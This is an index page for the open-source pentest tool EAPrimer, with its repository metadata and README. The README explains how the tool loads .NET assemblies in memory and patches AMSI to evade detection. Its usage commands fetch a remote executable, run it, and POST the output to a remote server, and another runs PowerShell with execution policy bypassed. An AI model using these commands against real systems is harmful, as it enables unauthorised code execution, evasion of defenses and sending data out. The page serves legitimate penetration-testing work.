Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/m8sec/eaprimer

C# project to Reflectively load .Net assemblies in memory
https://github.com/m8sec/eaprimer

amsi csharp executing-assemblies exploit net-assemblies pentesting powershell windows

Last synced: 8 days ago
JSON representation

C# project to Reflectively load .Net assemblies in memory

Host: GitHub
URL: https://github.com/m8sec/eaprimer
Owner: m8sec
License: mit
Created: 2020-09-23T18:47:38.000Z (about 4 years ago)
Default Branch: master
Last Pushed: 2024-06-19T14:31:24.000Z (5 months ago)
Last Synced: 2024-06-20T01:22:13.821Z (5 months ago)
Topics: amsi, csharp, executing-assemblies, exploit, net-assemblies, pentesting, powershell, windows
Language: PowerShell
Homepage:
Size: 32.2 KB
Stars: 14
Watchers: 4
Forks: 7
Open Issues: 0
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
- License: LICENSE

Awesome Lists containing this project

README

# EAPrimer

EAPrimer can be used to load .Net assemblies from a filepath or URL. On startup, it will attempt to perform in-memory patching of AMSI to bypass detection. By default, output is written to the console, however, this can be directed to a file or even sent via HTTP POST request to a remote server.

The latest, compiled version of the code is available here.

#### Usage:
Execute remote file with arguments and send output to server:
```text
EAPrimer.exe -path=https://192.168.1.2/Seatbelt.exe -post=https://192.168.1.2 -args="-group=all"
```

Execute local file with arguments and write output to file:
```text
EAPrimer.exe -path=.\Seatbelt.exe -post=results.txt -args="-group=all"
```

## Invoke-EAPrimer.ps1
The main purpose for writing EAPrimer.exe was to act as a support, or "Primer", for executing assemblies. Ultimately allowing for an "execute_assembly" module in pentest frameworks such as ActiveReign and CrackMapExec. The PowerShell script allows for added flexibility to create these modules.

> ⚠️ Alternate methods have since been used to more efficiently load .NET assemblies in memory. However, I have kept this file in the repo as an additional PoC.

#### Usage:
```powershell
powershell -exec bypass
Import-Module .\Invoke-EAPrimer.ps1
Invoke-EAPrimer -Path .\Seatbelt.exe -Args -group=all
```

## Credit
This was one of my first deep dives into C# and much of the heavy lifting was already done by these guys:
* Flangvik - NetLoader
* _RastaMouse - AMSI Bypass

## Notes
* Built with .Net 4.0
* Checkout SharpCollection for hosted payloads to test it out!